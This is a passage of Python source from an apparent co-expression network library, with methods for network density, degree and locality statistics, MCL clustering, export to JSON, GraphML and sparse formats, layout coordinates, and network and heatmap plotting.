keeping track of bootstraps in an aggregated data frame.
Returns
-------
Z-score of interactions if return_mean is True
otherwise a dataframe of trans edges
"""
# convert to list of loci to lists of genes
if not bootstrap:
genes_list = self.refgen.candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
else:
genes_list = self.refgen.bootstrap_candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
# Extract the edges for the full set of genes
edges = self.subnetwork(
genes_list,
min_distance=0,
sig_only=False,
trans_locus_only=True,
names_as_index=True,
)
if by_gene == True:
# Filter out trans edges
gene_split = pd.DataFrame.from_records(
chain(
*[
((gene_a, score), (gene_b, score))
for gene_a, gene_b, score, *junk in edges[edges.trans == True]
.reset_index()
.values
]
),
columns=["gene", "score"],
)
gene_split = gene_split.groupby("gene").agg(np.mean)
if iter_name is not None:
gene_split["iter"] = iter_name
gene_split.index.name = "gene"
gene_split["num_trans_edges"] = len(edges)
return gene_split
else:
if return_mean:
scores = edges.loc[edges["trans"] == True, "score"]
return np.nanmean(scores) / (1 / np.sqrt(len(scores)))
else:
return edges.loc[edges["trans"] == True,]
def trans_locus_locality(
self,
locus_list,
flank_limit,
bootstrap=False,
by_gene=False,
iter_name=None,
include_regression=False,
):
"""
Computes a table comparing local degree to global degree
of genes COMPUTED from a set of loci.
NOTE: interactions from genes originating from the same
locus are not counted for global or local degree.
Parameters
----------
locus_list : iterable of camoco.Loci
A list or equivalent of loci
flank_limit : int
The number of flanking genes passed to be pulled out
for each locus (passed onto the refgen.candidate_genes method)
bootstrap : bool (default: False)
If true, candidate genes will be bootstrapped from the COB
reference genome
iter_name : object (default: none)
This will be added as a column. Useful for
generating bootstraps of locality and keeping
track of which one a row came from after catting
multiple bootstraps together.
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
include_regression : bool (default: False)
Include the OLS regression residuals and fitted values
on local ~ global.
Returns
-------
A pandas DataFrame with local, global and residual columns
based on linear regression of local on global degree.
"""
# convert to list of loci to lists of genes
if not bootstrap:
genes_list = self.refgen.candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
else:
genes_list = self.refgen.bootstrap_candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
# self.log("Found {} candidate genes", len(genes_list))
# Get global and local degree for candidates
gdegree = self.global_degree(genes_list, trans_locus_only=True)
ldegree = self.local_degree(genes_list, trans_locus_only=True)
# Merge the columns
degree = ldegree.merge(gdegree, left_index=True, right_index=True)
degree.columns = ["local", "global"]
degree = degree.sort_values(by="global")
degree.index.name = "gene"
if include_regression:
# Add the regression lines
loc_deg = degree["local"]
glob_deg = degree["global"]
ols = sm.OLS(loc_deg.astype(float), glob_deg.astype(float)).fit()
degree["resid"] = ols.resid
degree["fitted"] = ols.fittedvalues
degree = degree.sort_values(by="resid", ascending=False)
if iter_name is not None:
degree["iter"] = iter_name
return degree
def density(self, gene_list, min_distance=None, by_gene=False):
"""
Calculates the density of the non-thresholded network edges
amongst genes within gene_list. Includes parameters to perform
measurements for genes within a certain distance of each other.
This corrects for cis regulatory elements increasing noise
in coexpression network.
Parameters
----------
gene_list : iter of Loci
List of genes from which to calculate density.
min_distance : int (default: None)
Ignore edges between genes less than min_distance
in density calculation.
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
Returns
-------
A network density OR density on a gene-wise basis
"""
# filter for only genes within network
edges = self.subnetwork(gene_list, min_distance=min_distance, sig_only=False)
if by_gene == True:
x = pd.DataFrame.from_records(
chain(
*[
((gene_a, score), (gene_b, score))
for gene_a, gene_b, score, sig, dis in edges.reset_index().values
]
),
columns=["gene", "score"],
)
return x.groupby("gene").agg(np.mean)
else:
if len(edges) == 0:
return np.nan
if len(edges) == 1:
return edges.score[0]
return np.nanmean(edges.score) / (1 / np.sqrt(len(edges)))
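    # Worked example of the density statistic above (editor's note; numbers illustrative):
    # mean(score) / (1 / sqrt(n)) is simply mean(score) * sqrt(n), so 50 subnetwork edges
    # with a mean z-score of 0.4 give a density of 0.4 * sqrt(50) ~= 2.83, i.e. the gene
    # set is about 2.8 standard errors more co-expressed than random genes would be.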
def to_dat(self, gene_list=None, filename=None, sig_only=True, min_distance=0):
"""
Outputs a .DAT file (see Sleipnir library)
"""
if filename is None:
filename = self.name + ".dat"
with open(filename, "w") as OUT:
# Get the score table
self.log("Pulling the scores for the .dat")
score = self.subnetwork(
gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=False,
)
            # Drop unnecessary columns
score.drop(["distance", "significant"], axis=1, inplace=True)
# Find the ids from those
self.log("Finding the IDs")
names = self._expr.index.values
ids = PCCUP.coex_expr_index(score.index.values, self.num_genes())
score.insert(0, "gene_a", names[ids[:, 0]])
score.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
# Print it out!
self.log("Writing the .dat")
score.to_csv(
OUT, columns=["gene_a", "gene_b", "score"], index=False, sep="\t"
)
del score
self.log("Done")
def to_graphml(self, file, gene_list=None, sig_only=True, min_distance=0):
"""
"""
# Get the edge indexes
self.log("Getting the network.")
edges = self.subnetwork(
gene_list=gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=False,
).index.values
# Find the ids from those
names = self._expr.index.values
edges = PCCUP.coex_expr_index(edges, self.num_genes())
df = pd.DataFrame(index=np.arange(edges.shape[0]))
df["gene_a"] = names[edges[:, 0]]
df["gene_b"] = names[edges[:, 1]]
del edges
del names
# Build the NetworkX network
self.log("Building the graph.")
net = nx.from_pandas_dataframe(df, "gene_a", "gene_b")
del df
# Print the file
self.log("Writing the file.")
nx.write_graphml(net, file)
del net
return
def to_json(
self,
gene_list=None,
filename=None,
sig_only=True,
min_distance=None,
max_edges=None,
remove_orphans=True,
ontology=None,
include_coordinates=True,
invert_y_coor=True,
min_degree=None,
include_edges=True
):
"""
Produce a JSON network object that can be loaded in cytoscape.js
or Cytoscape v3+.
Parameters
----------
gene_list : iterable of Locus objects
These loci or more specifically, genes,
must be in the COB RefGen object,
they are the genes in the network.
filename : str (default None)
If specified, the JSON string will be output to
file.
sig_only : bool (default: True)
Flag specifying whether or not to only
include the significant edges only. If
False, **All pairwise interactions** will
be included. (warning: it can be large).
        min_distance : int (default: None)
If specified, only interactions between
genes larger than this distance will be
included. This corrects for potential
cis-biased co-expression.
max_edges : int (default: None)
If specified, only the maximum number of
edges will be included. Priority of edges
is assigned based on score.
remove_orphans : bool (default: True)
Remove genes that have no edges in the
            network.
        ontology : camoco.Ontology (default: None)
If an ontology is specified, genes will
be annotated to belonging to terms within
the ontology. This is useful for highlighting
groups of genes once they are inside of
cytoscape(.js).
include_coordinates : bool (default: True)
If true, include coordinates for available
genes. Genes without calculated coordinates will
be left blank.
        invert_y_coor : bool (default: True)
If True, the y-coordinate will be inverted (y=-1*y).
For some reason Cytoscape has an inverted y-coordinate
system, toggling this will fix it.
Returns
-------
A JSON string or None if a filename is specified
"""
net = {"nodes": [], "edges": []}
# calculate included genes
if gene_list is None:
gene_list = self.genes()
# Filter by minimum degree
if min_degree is not None:
included = set(self.degree.query(f'Degree >= {min_degree}').index)
gene_list = [x for x in gene_list if x.id in included]
# Get the edge indexes
self.log("Getting the network.")
edges = self.subnetwork(
gene_list=gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=True,
)
if max_edges != None:
# Filter out only the top X edges by score
edges = edges.sort_values(by="score", ascending=False)[0:max_edges]
if include_coordinates == True:
# Create a map with x,y coordinates
coor = self.coordinates()
if invert_y_coor:
coor.y = -1*coor.y
coor_map = {
id:coor for id,coor in zip(coor.index,zip(coor.x,coor.y))
}
# Add edges to json data structure
if include_edges:
for source, target, score, distance, significant in edges.itertuples(
index=False
):
net["edges"].append(
{
"data": {
"source": source,
"target": target,
"score": float(score),
"distance": float(fix_val(distance)),
}
}
)
# Handle any ontological business
if ontology != None:
# Make a map from gene name to ontology
ont_map = defaultdict(set)
for term in ontology.iter_terms():
for locus in term.loci:
ont_map[locus.id].add(term.id)
parents = defaultdict(list)
# generate the subnetwork for the genes
if gene_list == None:
gene_list = list(self.refgen.iter_genes())
else:
gene_list = set(gene_list)
if remove_orphans == True:
# get a list of all the genes with edges
has_edges = set(edges.gene_a).union(edges.gene_b)
gene_list = [x for x in gene_list if x.id in has_edges]
for gene in gene_list:
node = {"data": {"id": str(gene.id), "classes": "gene"}}
            if ontology is not None and gene.id in ont_map:
for x in ont_map[gene.id]:
node["data"][x] = True
node["data"].update(gene.attr)
if include_coordinates:
try:
pos = coor_map[gene.id]
except KeyError:
pos = (0,0)
node['position'] = {
"x" : pos[0],
"y" : pos[1]
}
net["nodes"].append(node)
# Return the correct output
net = {"elements": net}
if filename:
with open(filename, "w") as OUT:
print(json.dumps(net), file=OUT)
            net = None  # a filename was given, so return None
else:
net = json.dumps(net)
return net
def to_sparse_matrix(
self, gene_list=None,
min_distance=None,
max_edges=None,
remove_orphans=False
):
"""
Convert the co-expression interactions to a
scipy sparse matrix.
Parameters
-----
gene_list: iter of Loci (default: None)
If specified, return only the interactions among
loci in the list. If None, use all genes.
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
max_edges : int (default: None)
If specified, only the maximum number of
edges will be included. Priority of edges
is assigned based on score.
        remove_orphans : bool (default: False)
Remove genes that have no edges in the
network.
Returns
-------
A tuple (a,b) where 'a' is a scipy sparse matrix and
'b' is a mapping from gene_id to index.
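        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> matrix, gene_index = cob.to_sparse_matrix(min_distance=50000)
        >>> matrix = matrix.tocsr()  # convert from COO for fast row slicing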
"""
from scipy import sparse
self.log("Getting genes")
# first get the subnetwork in pair form
self.log("Pulling edges")
edges = self.subnetwork(
gene_list=gene_list,
min_distance=min_distance,
sig_only=True,
names_as_cols=True,
names_as_index=False,
)
# Option to limit the number of edges
if max_edges is not None:
self.log("Filtering edges")
edges = edges.sort_values(by="score", ascending=False)[
0 : min(max_edges, len(edges))
]
# Create a gene index
self.log("Creating Index")
        if gene_list is None:
gene_list = list(self.refgen.iter_genes())
else:
gene_list = set(gene_list)
gene_index = {g.id: i for i, g in enumerate(gene_list)}
nlen = len(gene_list)
# Option to restrict gene list to only genes with edges
if remove_orphans:
self.log("Removing orphans")
not_orphans = set(edges.gene_a).union(edges.gene_b)
gene_list = [g for g in gene_list if g.id in not_orphans]
            self.log(f"Removed {nlen - len(gene_list)} orphan genes")
# get the expression matrix indices for all the genes
row = [gene_index[x] for x in edges.gene_a.values]
col = [gene_index[x] for x in edges.gene_b.values]
data = list(edges.score.values)
# Make the values symmetric by doubling everything
# Note: by nature we dont have cycles so we dont have to
# worry about the diagonal
self.log("Making matrix symmetric")
d = data + data
r = row + col
c = col + row
self.log("Creating matrix")
matrix = sparse.coo_matrix((d, (r, c)), shape=(nlen, nlen), dtype=None)
return (matrix, gene_index)
def mcl(
self,
gene_list=None,
I=2.0,
min_distance=None,
min_cluster_size=0,
max_cluster_size=10e10,
):
"""
Returns clusters (as list) as designated by MCL (Markov Clustering).
Parameters
----------
gene_list : a gene iterable
These are the genes which will be clustered
I : float (default: 2.0)
This is the inflation parameter passed into mcl.
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
min_cluster_size : int (default: 0)
The minimum cluster size to return. Filter out clusters smaller
than this.
max_cluster_size : float (default: 10e10)
The maximum cluster size to return. Filter out clusters larger
than this.
Returns
-------
        A list of clusters, each containing a list of genes in that cluster
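        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> clusters = cob.mcl(I=2.0, min_cluster_size=10)
        >>> largest = clusters[0]  # clusters are sorted largest first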
"""
import markov_clustering as mc
matrix, gene_index = self.to_sparse_matrix(gene_list=gene_list)
# Run MCL
result = mc.run_mcl(
matrix,
inflation=I,
verbose=True
)
clusters = mc.get_clusters(result)
# MCL traditionally returns clusters by size with 0 being the largest
clusters = sorted(clusters, key=lambda x: len(x), reverse=True)
# Create a dictionary to map ids to gene names
gene_id_index = {v: k for k, v in gene_index.items()}
result = []
for c in clusters:
if len(c) < min_cluster_size or len(c) > max_cluster_size:
continue
# convert to loci
loci = self.refgen.from_ids([gene_id_index[i] for i in c])
result.append(loci)
return result
def _mcl_legacy(
self,
gene_list=None,
I=2.0,
scheme=7,
min_distance=None,
min_cluster_size=0,
max_cluster_size=10e10,
):
"""
A *very* thin wrapper to the MCL program. The MCL program must
be accessible by a subprocess (i.e. by the shell).
Returns clusters (as list) as designated by MCL.
Parameters
----------
gene_list : a gene iterable
These are the genes which will be clustered
I : float (default: 2.0)
This is the inflation parameter passed into mcl.
scheme : int in 1:7
MCL accepts parameter schemes. See mcl docs for more details
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
min_cluster_size : int (default: 0)
The minimum cluster size to return. Filter out clusters smaller
than this.
max_cluster_size : float (default: 10e10)
The maximum cluster size to return. Filter out clusters larger
than this.
Returns
-------
        A list of clusters, each containing a list of genes in that cluster
"""
# output dat to tmpfile
tmp = self._tmpfile()
self.to_dat(
filename=tmp.name,
gene_list=gene_list,
min_distance=min_distance,
sig_only=True,
)
# build the mcl command
cmd = "mcl {} --abc -scheme {} -I {} -o -".format(tmp.name, scheme, I)
self.log("running MCL: {}", cmd)
try:
p = Popen(cmd, stdout=PIPE, stderr=sys.stderr, shell=True)
self.log("waiting for MCL to finish...")
sout = p.communicate()[0]
p.wait()
self.log("MCL done, Reading results.")
if p.returncode == 0:
                # Filter out clusters that are smaller than the min size
return list(
filter(
lambda x: len(x) > min_cluster_size
and len(x) < max_cluster_size,
# Generate ids from the refgen
[
self.refgen.from_ids(
[gene.decode("utf-8") for gene in line.split()]
)
for line in sout.splitlines()
],
)
)
else:
if p.returncode == 127:
raise FileNotFoundError()
else:
raise ValueError("MCL failed: return code: {}".format(p.returncode))
except FileNotFoundError as e:
self.log(
                'Could not find MCL in PATH. Make sure it is installed and shell accessible as "mcl".'
)
def local_degree(self, gene_list, trans_locus_only=False):
"""
Returns the local degree of a list of genes
Parameters
----------
gene_list : iterable (co.Locus object)
            a list of genes for which to retrieve the local degree. The
genes must be in the COB object (of course)
trans_locus_only : bool (default: False)
only count edges if they are from genes originating from
different loci. Each gene MUST have 'parent_locus' set in
its attr object.
"""
subnetwork = self.subnetwork(
gene_list, sig_only=True, trans_locus_only=trans_locus_only
)
if trans_locus_only:
subnetwork = subnetwork.ix[subnetwork.trans]
local_degree = pd.DataFrame(
list(Counter(chain(*subnetwork.index.get_values())).items()),
columns=["Gene", "Degree"],
).set_index("Gene")
# We need to find genes not in the subnetwork and add them as degree 0
# The code below is ~optimized~
# DO NOT alter unless you know what you're doing :)
degree_zero_genes = pd.DataFrame(
[(gene.id, 0) for gene in gene_list if gene.id not in local_degree.index],
columns=["Gene", "Degree"],
).set_index("Gene")
return pd.concat([local_degree, degree_zero_genes])
def global_degree(self, gene_list, trans_locus_only=False):
"""
Returns the global degree of a list of genes
Parameters
----------
gene_list : iterable (co.Locus object)
            a list of genes for which to retrieve the global degree. The
genes must be in the COB object (of course)
trans_locus_only : bool (default: False)
only count edges if they are from genes originating from
different loci. Each gene MUST have 'parent_locus' set in
its attr object.
"""
try:
if isinstance(gene_list, Locus):
if trans_locus_only:
raise ValueError("Cannot calculate cis degree on one gene.")
return self.degree.loc[gene_list.id].Degree
else:
degree = self.degree.ix[[x.id for x in gene_list]].fillna(0)
if trans_locus_only:
degree = degree - self.cis_degree(gene_list)
return degree
except KeyError as e:
return 0
def cis_degree(self, gene_list):
"""
Returns the number of *cis* interactions for each gene in the gene
        list. Two genes are in *cis* if they share the same parent locus.
**Therefore: each gene object MUST have its 'parent_locus' attr set!!**
Parameters
----------
gene_list : iterable of Gene Objects
"""
subnetwork = self.subnetwork(gene_list, sig_only=True, trans_locus_only=True)
# Invert the trans column
subnetwork["cis"] = np.logical_not(subnetwork.trans)
subnetwork = subnetwork.ix[subnetwork.cis]
local_degree = pd.DataFrame(
list(Counter(chain(*subnetwork.index.get_values())).items()),
columns=["Gene", "Degree"],
).set_index("Gene")
# We need to find genes not in the subnetwork and add them as degree 0
# The code below is ~optimized~
# DO NOT alter unless you know what you're doing :)
degree_zero_genes = pd.DataFrame(
[(gene.id, 0) for gene in gene_list if gene.id not in local_degree.index],
columns=["Gene", "Degree"],
).set_index("Gene")
return pd.concat([local_degree, degree_zero_genes])
def locality(self, gene_list, iter_name=None, include_regression=False):
"""
Computes the merged local vs global degree table
Parameters
----------
gene_list : iterable of camoco.Loci
A list or equivalent of loci
        iter_name : object (default: None)
            This will be added as a column. Useful for
            generating bootstraps of locality and keeping
            track of which bootstrap a row came from after
            concatenating multiple bootstraps together.
include_regression : bool (default: False)
Include the OLS regression residuals and fitted values
on local ~ global.
Returns
-------
A pandas DataFrame with local, global and residual columns
based on linear regression of local on global degree.
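        Example (illustrative; assumes ``cob`` is a COB instance and
        ``candidate_genes`` is an iterable of Locus objects)
        >>> degree = cob.locality(candidate_genes, include_regression=True)
        >>> top_local = degree.head(10)  # already sorted by residual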
"""
global_degree = self.global_degree(gene_list)
local_degree = self.local_degree(gene_list)
degree = global_degree.merge(local_degree, left_index=True, right_index=True)
degree.columns = ["global", "local"]
degree = degree.sort_values(by="global")
if include_regression:
            # set up variables to use astype to avoid pandas sm.OLS error
loc_deg = degree["local"]
glob_deg = degree["global"]
ols = sm.OLS(loc_deg.astype(float), glob_deg.astype(float)).fit()
degree["resid"] = ols.resid
degree["fitted"] = ols.fittedvalues
degree = degree.sort_values(by="resid", ascending=False)
if iter_name is not None:
degree["iter_name"] = iter_name
return degree
""" ----------------------------------------------------------------------
Cluster Methods
"""
def cluster_genes(self, cluster_id):
"""
Return the genes that are in a cluster
Parameters
----------
cluster_id: str / int
The ID of the cluster for which to get the gene IDs.
Technically a string, but MCL clusters are assigned
numbers. This is automatically converted so '0' == 0.
Returns
-------
A list of Loci (genes) that are in the cluster
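        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> genes = cob.cluster_genes(0)  # genes in the largest MCL cluster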
"""
ids = self.clusters.query(f"cluster == {cluster_id}").index.values
return self.refgen[ids]
def cluster_coordinates(
self,
cluster_number,
nstd=2,
min_ratio=1.618
):
"""
Calculate the rough coordinates around an MCL
cluster.
Returns parameters that can be used to draw an ellipse.
e.g. for cluster #5
>>> from matplotlib.patches import Ellipse
>>> e = Ellipse(**self.cluster_coordinates(5))
"""
# Solution inspired by:
# https://stackoverflow.com/questions/12301071/multidimensional-confidence-intervals
# Get the coordinates of the MCL cluster
coor = self.coordinates()
gene_ids = [x.id for x in self.cluster_genes(cluster_number)]
points = coor.loc[gene_ids]
points = points.iloc[np.logical_not(np.isnan(points.x)).values, :]
# Calculate stats for eigenvalues
pos = points.mean(axis=0)
cov = np.cov(points, rowvar=False)
def eigsorted(cov):
vals, vecs = np.linalg.eigh(cov)
order = vals.argsort()[::-1]
return vals[order], vecs[:, order]
vals, vecs = eigsorted(cov)
theta = np.degrees(np.arctan2(*vecs[:, 0][::-1]))
width, height = 2 * nstd * np.sqrt(vals)
if min_ratio:
small_axis,big_axis = sorted([width,height])
if big_axis / small_axis < min_ratio:
small_axis = big_axis / min_ratio
if width < height:
width = small_axis
else:
height = small_axis
return {"xy": pos, "width": width, "height": height, "angle": theta}
def cluster_expression(self,
min_cluster_size=10,
max_cluster_size=10e10,
normalize=True
):
"""
Get a matrix of cluster x accession gene expression.
Each row represents the average gene expression in each accession
for the genes in the cluster.
Parameters
----------
min_cluster_size : int (default:10)
Clusters smaller than this will not be included in the
expression matrix.
normalize : bool (default:True)
If true, each row will be standard normalized meaning that
0 will represent the average (mean) across all accessions
and the resultant values in the row will represent the number
of standard deviations from the mean.
Returns
-------
A DataFrame containing gene expression values. Each row represents
a cluster and each column represents an accession. The values of
the matrix are the average gene expression (of genes in the cluster)
for each accession.
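        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> dm = cob.cluster_expression(min_cluster_size=20, normalize=True)
        >>> most_variable = dm.std(axis=1).sort_values(ascending=False)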
"""
# Extract clusters
dm = (
self.clusters.groupby("cluster")
.filter(lambda x: len(x) >= min_cluster_size and len(x) <= max_cluster_size)
.groupby("cluster")
.apply(lambda x: self.expr(genes=self.refgen[x.index]).mean())
)
if normalize:
dm = dm.apply(lambda x: (x - x.mean()) / x.std(), axis=1)
if len(dm) == 0:
self.log.warn("No clusters larger than {} ... skipping", min_cluster_size)
return None
return dm
def import_coordinates_from_cyjs(
self,
cyjs_path,
invert_y_coor=True
):
'''
Import node coordinates from a cyjs file.
Parameters
----------
cyjs_path : str (Pathlike)
Path the cytoscape JSON file
invert_y_coor : bool (default: True)
If True, the y-coordinate will be inverted (y=-1*y).
For some reason Cytoscape has an inverted y-coordinate
system, toggling this will fix it.
'''
cyjs = json.load(open(cyjs_path,'r'))
pos = pd.DataFrame(
[(n['data']['id_original'].upper(), n['position']['x'], n['position']['y']) \
for n in cyjs['elements']['nodes']],
columns=['gene','x','y']
)
if invert_y_coor:
pos['y'] = -1*pos['y']
index = pos['gene']
pos = pos[['x','y']]
pos.index = index
self._bcolz("coordinates", df=pos)
def coordinates(
self,
method='spring',
iterations=10,
force=False,
max_edges=10e100,
lcc_only=True,
):
"""
        Returns x,y coordinates for (a subset of) genes in the network.
        If coordinates have not been previously calculated OR the force
        kwarg is True, gene coordinates will be calculated with either a
        sparse spring (Fruchterman-Reingold) layout or the ForceAtlas2
        algorithm, depending on the ``method`` kwarg. NOTE: by default,
        only the largest connected component is laid out (lcc_only=True).
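        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> pos = cob.coordinates(method='spring', iterations=50)
        >>> pos = cob.coordinates(force=True, method='forceatlas2')  # recalculate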
"""
from fa2 import ForceAtlas2
pos = self._bcolz("coordinates")
if pos is None or force == True:
import scipy.sparse.csgraph as csgraph
import networkx
A, i = self.to_sparse_matrix(remove_orphans=False, max_edges=max_edges)
# generate a reverse lookup for index to label
rev_i = {v: k for k, v in i.items()}
num, ccindex = csgraph.connected_components(A, directed=False)
# convert to csc
self.log(f"Converting to compressed sparse column")
L = A.tocsc()
if lcc_only:
self.log("Extracting largest connected component")
lcc_index, num = Counter(ccindex).most_common(1)[0]
L = L[ccindex == lcc_index, :][:, ccindex == lcc_index]
self.log(f"The largest CC has {num} nodes")
# get labels based on index in L
(lcc_indices,) = np.where(ccindex == lcc_index)
labels = [rev_i[x] for x in lcc_indices]
else:
labels = [rev_i[x] for x in range(L.shape[0])]
self.log("Calculating positions")
if method == 'spring':
coordinates = nx.layout._sparse_fruchterman_reingold(
L,
iterations=iterations
)
elif method == 'forceatlas2':
forceatlas2 = ForceAtlas2(
# Behavior alternatives
outboundAttractionDistribution=True,
linLogMode=False,
adjustSizes=False,
edgeWeightInfluence=1.0,
# Performance
jitterTolerance=0.1,
barnesHutOptimize=True,
barnesHutTheta=0.6, #1.2,
multiThreaded=False,
# Tuning
scalingRatio=2.0,
strongGravityMode=True,
gravity=0.1,
# Logging
verbose=True,
)
coordinates = positions = forceatlas2.forceatlas2(
L, pos=None, iterations=iterations
)
pos = pd.DataFrame(coordinates)
pos.index = labels
pos.columns = ["x", "y"]
self._bcolz("coordinates", df=pos)
return pos
""" ----------------------------------------------------------------------
Plotting Methods
"""
def plot_network(
self,
filename=None,
target_genes=None,
target_gene_alpha=0.5,
ax=None,
include_title=True,
# coordinate kwargs
force=False,
lcc_only=True,
max_edges=None,
min_degree=None,
iterations=100,
# cluster kwargs
draw_clusters=True,
color_clusters=True,
label_clusters=True,
label_size=20,
min_cluster_size=100,
max_cluster_size=10e100,
max_clusters=None,
cluster_std=1,
cluster_line_width=2,
# style kwargs
node_size=20,
edge_color='k',
edge_alpha=0.7,
draw_edges=False,
background_color='#2196F3',#'xkcd:dark',
foreground_color='#BD0000'#"xkcd:crimson"
):
'''
Plot a "hairball" image of the network.
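        Example (illustrative; assumes ``cob`` is a COB instance and
        ``candidates`` is an iterable of Locus objects)
        >>> ax = cob.plot_network(target_genes=candidates, draw_clusters=True)
        >>> ax = cob.plot_network(filename='network.png', min_degree=5)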
'''
from matplotlib.colors import XKCD_COLORS
xkcd = XKCD_COLORS.copy()
coor = self.coordinates(lcc_only=lcc_only, force=force, iterations=iterations)
# Filter by degree
if min_degree is not None:
coor = coor.loc[self.degree.query(f'Degree >= {min_degree}').index]
if ax is None:
fig = plt.figure(facecolor="white", figsize=(8, 8))
ax = fig.add_subplot(111)
# Plot the background genes
ax.set_facecolor("white")
ax.grid(False)
ax.set_xticks([])
ax.set_yticks([])
# Plot edges
if draw_edges:
self.log("Plotting edges")
edges = self.subnetwork(
gene_list=self.refgen.from_ids(
coor.index.values
)
).reset_index()
if max_edges is not None:
max_edges = min(max_edges,len(edges))
edges = edges.sort_values(by="score", ascending=False)[0:max_edges]
# Extract the coordinates for edges
a_coor = coor.loc[edges.gene_a]
b_coor = coor.loc[edges.gene_b]
#Plot using a matplotlib lines collection
lines = LineCollection(
zip(zip(a_coor.x,a_coor.y),zip(b_coor.x,b_coor.y)),
colors=edge_color,
antialiased=(1,),
alpha=edge_alpha
)
lines.set_zorder(1)
ax.add_collection(lines)
ax.scatter(
coor.x,
coor.y,
alpha=1,
color=background_color, #xkcd.pop(background_color),
s=node_size
)
# Plot the genes
if target_genes is not None:
self.log("Plotting genes")
ids = coor.loc[[x.id for x in target_genes if x.id in coor.index]]
nodes = ax.scatter(
ids.x,
ids.y,
color=foreground_color,
s=node_size,
alpha=target_gene_alpha
)
nodes.set_zorder(2)
# Plot clusters
if draw_clusters:
from matplotlib.patches import Ellipse
big_clusters = [
k
for k, v in Counter(self.clusters.cluster).items()
if v > min_cluster_size
and v < max_cluster_size
]
# define cluster colors
cluster_colors = list(xkcd.values())
for i, clus in enumerate(big_clusters):
if max_clusters is not None and i + 1 > max_clusters:
break
ids = [x.id for x in self.cluster_genes(clus) if x.id in coor.index]
ccoor = coor.loc[ids]
if color_clusters:
# This will overwrite the genes in the cluster giving them colors
ax.scatter(
ccoor.x,
ccoor.y,
s=node_size,
color=cluster_colors[i]
)
try:
c = self.cluster_coordinates(
clus,
nstd=cluster_std
)
except (KeyError,np.linalg.LinAlgError) as e:
continue
c.update(
{
"edgecolor": "black",
"fill" : False,
"linestyle": ":",
"linewidth": cluster_line_width,
}
)
e = Ellipse(**c)
ax.add_artist(e)
if label_clusters:
ax.annotate(
clus,
size=label_size,
xy=(c['xy']['x'],c['xy']['y']),
bbox=dict(boxstyle="round", fc="w")
)
if include_title:
ax.set_title(self.name,size='large')
if filename is not None:
plt.savefig(filename)
return ax
def plot_heatmap(
self,
filename=None,
ax=None,
genes=None,
accessions=None,
gene_normalize=True,
raw=False,
cluster_method="ward",
include_accession_labels=None,
include_gene_labels=None,
avg_by_cluster=False,
min_cluster_size=10,
max_cluster_size=10e10,
cluster_accessions=True,
plot_dendrogram=True,
nan_color=None,
cmap=None,
expr_boundaries=3.5,
figsize=(20,20)
):
"""
Plots a heatmap of genes x expression.
Parameters
----------
filename : str
If specified, figure will be written to output filename
genes : co.Locus iterable (default: None)
An iterable of genes to plot expression for
accessions : iterable of str
An iterable of strings to extract for expression values.
Values must be a subset of column values in expression matrix
gene_normalize: bool (default: True)
normalize gene values in heatmap to show expression patterns.
raw : bool (default: False)
            If true, raw expression data will be used. Default is to use
            the normalized, QC'd data.
        cluster_method : str (default: 'ward')
Specifies how to organize the gene axis in the heatmap. If
'mcl', genes will be organized by MCL cluster. Otherwise
the value must be one of the linkage methods defined by
the scipy.cluster.hierarchy.linkage function: [single,
complete, average, weighted, centroid, median, ward].
https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
        include_accession_labels : bool (default: None)
            Force the rendering of accession labels. If None, accession
            labels will be included as long as there are fewer than 60.
        include_gene_labels : bool (default: None)
            Force rendering of gene labels in heatmap. If None, gene
            labels will be rendered as long as there are fewer than 100.
avg_by_cluster : bool (default: False)
If True, gene expression values will be averaged by MCL cluster
showing a single row per cluster.
min_cluster_size : int ( default: 10)
If avg_by_cluster, only cluster sizes larger than min_cluster_size
will be included.
cluster_accessions : bool (default: True)
If true, accessions will be clustered
plot_dendrogram : bool (default: True)
If true, dendrograms will be plotted
nan_color : str (default: None)
Specifies the color of nans in the heatmap. Changing this
to a high contrast color can help identify problem areas.
If not specified, nans will be the middle (neutral) value
in the heatmap.
        cmap : str (default: None)
            A matplotlib color map for the heatmap. If None, the
            network's default colormap is used. See
https://matplotlib.org/gallery/color/colormap_reference.html
for options.
        expr_boundaries : float (default: 3.5)
Set the min/max boundaries for expression values so that
the cmap colors aren't dominated by outliers
Returns
-------
a populated matplotlib figure object
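        Example (illustrative; assumes ``cob`` is a COB instance)
        >>> fig = cob.plot_heatmap(cluster_method='mcl', avg_by_cluster=True)
        >>> fig = cob.plot_heatmap(filename='heatmap.png', cluster_method='ward')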
"""
# These are valid hierarchical clustering methods
hier_cluster_methods = [
"single",
"complete",
"average",
"weighted",
"centroid",
"median",
"ward",
]
        # Get the Expression Matrix
if avg_by_cluster == True:
dm = self.cluster_expression(
min_cluster_size=min_cluster_size,
max_cluster_size=max_cluster_size,
normalize=True
)
else:
# Fetch the Expr Matrix
dm = self.expr(
genes=genes,
accessions=accessions,
raw=raw,
gene_normalize=gene_normalize,
)
# set the outliers to the maximium value for the heatmap
dm[dm > expr_boundaries] = expr_boundaries
dm[dm < -1*expr_boundaries] = -1 * expr_boundaries
# Get the Gene clustering order
if cluster_method in hier_cluster_methods:
self.log("Ordering rows by leaf")
expr_linkage = fastcluster.linkage(dm.fillna(0), method=cluster_method)
order = leaves_list(expr_linkage)
dm = dm.iloc[order, :]
elif cluster_method == "mcl":
